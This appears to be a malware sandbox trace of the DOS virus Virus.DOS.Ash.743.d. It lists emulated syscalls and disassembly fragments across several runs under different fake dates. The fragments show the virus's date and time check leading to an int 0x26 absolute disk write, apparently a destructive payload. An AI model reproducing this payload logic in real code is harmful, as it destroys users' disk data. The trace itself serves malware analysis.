Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.d

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:48:53.164014923Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-17T22:48:53.166218745Z	78	PC: 12afb \| Find first file
2018-12-17T22:48:53.172582274Z	59	PC: 12b92 \| Change current directory
2018-12-17T22:48:53.176558973Z	42	PC: 12ba1 \| Get date 0x12ba1: cmp dl, 4 0x12ba4: jne 0x12bb0 0x12ba6: cmp dh, 7 0x12ba9: jne 0x12bb0 0x12bab: xor ax, ax 0x12bad: jmp 0x12bce 0x12baf: nop 0x12bb0: mov ah, 0x2c 0x12bb2: int 0x21 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax
2018-12-17T22:48:53.179329679Z	44	PC: 12bb4 \| Get time 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax 0x12bcb: jne 0x12bce 0x12bcd: inc ax 0x12bce: mov dx, ax 0x12bd0: mov cx, 1 0x12bd3: xor bx, bx 0x12bd5: mov ah, 0x19 0x12bd7: int 0x21 0x12bd9: int 0x26 0x12bdb: mov bx, 0x31a
2018-12-17T22:48:53.181321562Z	44	PC: 12be2 \| Get time 0x12be2: inc dh 0x12be4: cmp dh, byte ptr [0x319] 0x12be8: jl 0x12bf0 0x12bea: sub dh, byte ptr [0x319] 0x12bee: jmp 0x12be4 0x12bf0: mov al, dh 0x12bf2: mov cl, al 0x12bf4: cwde 0x12bf5: shl ax, 1 0x12bf7: add bx, ax 0x12bf9: mov si, word ptr [bx] 0x12bfb: mov ch, byte ptr [si - 1] 0x12bfe: mov dx, si 0x12c00: mov ah, 9 0x12c02: int 0x21 0x12c04: cmp ch, 0 0x12c07: jne 0x12c0b 0x12c09: int 0x20 0x12c0b: cmp ch, 1 0x12c0e: jne 0x12c11
2018-12-17T22:48:53.183272981Z	9	PC: 12c04 \| Display string (Could not find end pointer)
2018-12-17T22:48:53.188080823Z	26	PC: 12ab9 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9709,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:42.280230041Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-25T12:23:42.282786583Z	78	PC: 12afb \| Find first file
2018-12-25T12:23:42.289535945Z	59	PC: 12b92 \| Change current directory
2018-12-25T12:23:42.293962675Z	42	PC: 12ba1 \| Get date 0x12ba1: cmp dl, 4 0x12ba4: jne 0x12bb0 0x12ba6: cmp dh, 7 0x12ba9: jne 0x12bb0 0x12bab: xor ax, ax 0x12bad: jmp 0x12bce 0x12baf: nop 0x12bb0: mov ah, 0x2c 0x12bb2: int 0x21 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax
2018-12-25T12:23:42.29630996Z	44	PC: 12bb4 \| Get time 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax 0x12bcb: jne 0x12bce 0x12bcd: inc ax 0x12bce: mov dx, ax 0x12bd0: mov cx, 1 0x12bd3: xor bx, bx 0x12bd5: mov ah, 0x19 0x12bd7: int 0x21 0x12bd9: int 0x26 0x12bdb: mov bx, 0x31a
2018-12-25T12:23:42.298834508Z	25	PC: 12bd9 \| Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9709,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:42.464003195Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-25T12:23:42.465767943Z	78	PC: 12afb \| Find first file
2018-12-25T12:23:42.472359614Z	59	PC: 12b92 \| Change current directory
2018-12-25T12:23:42.476760791Z	42	PC: 12ba1 \| Get date 0x12ba1: cmp dl, 4 0x12ba4: jne 0x12bb0 0x12ba6: cmp dh, 7 0x12ba9: jne 0x12bb0 0x12bab: xor ax, ax 0x12bad: jmp 0x12bce 0x12baf: nop 0x12bb0: mov ah, 0x2c 0x12bb2: int 0x21 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax
2018-12-25T12:23:42.479420831Z	44	PC: 12bb4 \| Get time 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax 0x12bcb: jne 0x12bce 0x12bcd: inc ax 0x12bce: mov dx, ax 0x12bd0: mov cx, 1 0x12bd3: xor bx, bx 0x12bd5: mov ah, 0x19 0x12bd7: int 0x21 0x12bd9: int 0x26 0x12bdb: mov bx, 0x31a
2018-12-25T12:23:42.481026378Z	25	PC: 12bd9 \| Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9709,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:42.505363668Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-25T12:23:42.507289419Z	78	PC: 12afb \| Find first file
2018-12-25T12:23:42.514963567Z	59	PC: 12b92 \| Change current directory
2018-12-25T12:23:42.519516412Z	42	PC: 12ba1 \| Get date 0x12ba1: cmp dl, 4 0x12ba4: jne 0x12bb0 0x12ba6: cmp dh, 7 0x12ba9: jne 0x12bb0 0x12bab: xor ax, ax 0x12bad: jmp 0x12bce 0x12baf: nop 0x12bb0: mov ah, 0x2c 0x12bb2: int 0x21 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax
2018-12-25T12:23:42.522229694Z	44	PC: 12bb4 \| Get time 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax 0x12bcb: jne 0x12bce 0x12bcd: inc ax 0x12bce: mov dx, ax 0x12bd0: mov cx, 1 0x12bd3: xor bx, bx 0x12bd5: mov ah, 0x19 0x12bd7: int 0x21 0x12bd9: int 0x26 0x12bdb: mov bx, 0x31a
2018-12-25T12:23:42.525379179Z	44	PC: 12be2 \| Get time 0x12be2: inc dh 0x12be4: cmp dh, byte ptr [0x319] 0x12be8: jl 0x12bf0 0x12bea: sub dh, byte ptr [0x319] 0x12bee: jmp 0x12be4 0x12bf0: mov al, dh 0x12bf2: mov cl, al 0x12bf4: cwde 0x12bf5: shl ax, 1 0x12bf7: add bx, ax 0x12bf9: mov si, word ptr [bx] 0x12bfb: mov ch, byte ptr [si - 1] 0x12bfe: mov dx, si 0x12c00: mov ah, 9 0x12c02: int 0x21 0x12c04: cmp ch, 0 0x12c07: jne 0x12c0b 0x12c09: int 0x20 0x12c0b: cmp ch, 1 0x12c0e: jne 0x12c11
2018-12-25T12:23:42.52781427Z	9	PC: 12c04 \| Display string (String= 'S��S��S��S��S��S��S��S��S��S��S��x��'B66a:' �test.4c.om2 �0.40 �')
2018-12-25T12:23:42.533736104Z	26	PC: 12ab9 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9709,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:42.729546165Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-25T12:23:42.732437501Z	78	PC: 12afb \| Find first file
2018-12-25T12:23:42.738372995Z	59	PC: 12b92 \| Change current directory
2018-12-25T12:23:42.74245482Z	42	PC: 12ba1 \| Get date 0x12ba1: cmp dl, 4 0x12ba4: jne 0x12bb0 0x12ba6: cmp dh, 7 0x12ba9: jne 0x12bb0 0x12bab: xor ax, ax 0x12bad: jmp 0x12bce 0x12baf: nop 0x12bb0: mov ah, 0x2c 0x12bb2: int 0x21 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax
2018-12-25T12:23:42.745645662Z	44	PC: 12bb4 \| Get time 0x12bb4: or cl, cl 0x12bb6: jne 0x12bdb 0x12bb8: cmp ch, 6 0x12bbb: jge 0x12bdb 0x12bbd: add cl, ch 0x12bbf: mov ax, cx 0x12bc1: cwde 0x12bc2: add al, dh 0x12bc4: adc al, dl 0x12bc6: adc ah, 0 0x12bc9: or ax, ax 0x12bcb: jne 0x12bce 0x12bcd: inc ax 0x12bce: mov dx, ax 0x12bd0: mov cx, 1 0x12bd3: xor bx, bx 0x12bd5: mov ah, 0x19 0x12bd7: int 0x21 0x12bd9: int 0x26 0x12bdb: mov bx, 0x31a
2018-12-25T12:23:42.748061606Z	44	PC: 12be2 \| Get time 0x12be2: inc dh 0x12be4: cmp dh, byte ptr [0x319] 0x12be8: jl 0x12bf0 0x12bea: sub dh, byte ptr [0x319] 0x12bee: jmp 0x12be4 0x12bf0: mov al, dh 0x12bf2: mov cl, al 0x12bf4: cwde 0x12bf5: shl ax, 1 0x12bf7: add bx, ax 0x12bf9: mov si, word ptr [bx] 0x12bfb: mov ch, byte ptr [si - 1] 0x12bfe: mov dx, si 0x12c00: mov ah, 9 0x12c02: int 0x21 0x12c04: cmp ch, 0 0x12c07: jne 0x12c0b 0x12c09: int 0x20 0x12c0b: cmp ch, 1 0x12c0e: jne 0x12c11
2018-12-25T12:23:42.75019583Z	9	PC: 12c04 \| Display string (String= 'S��S��S��S��S��S��S��S��S��S��S��x��'B66a:' �test.4c.om2 �0.40 �')
2018-12-25T12:23:42.755491134Z	26	PC: 12ab9 \| Set disk transfer address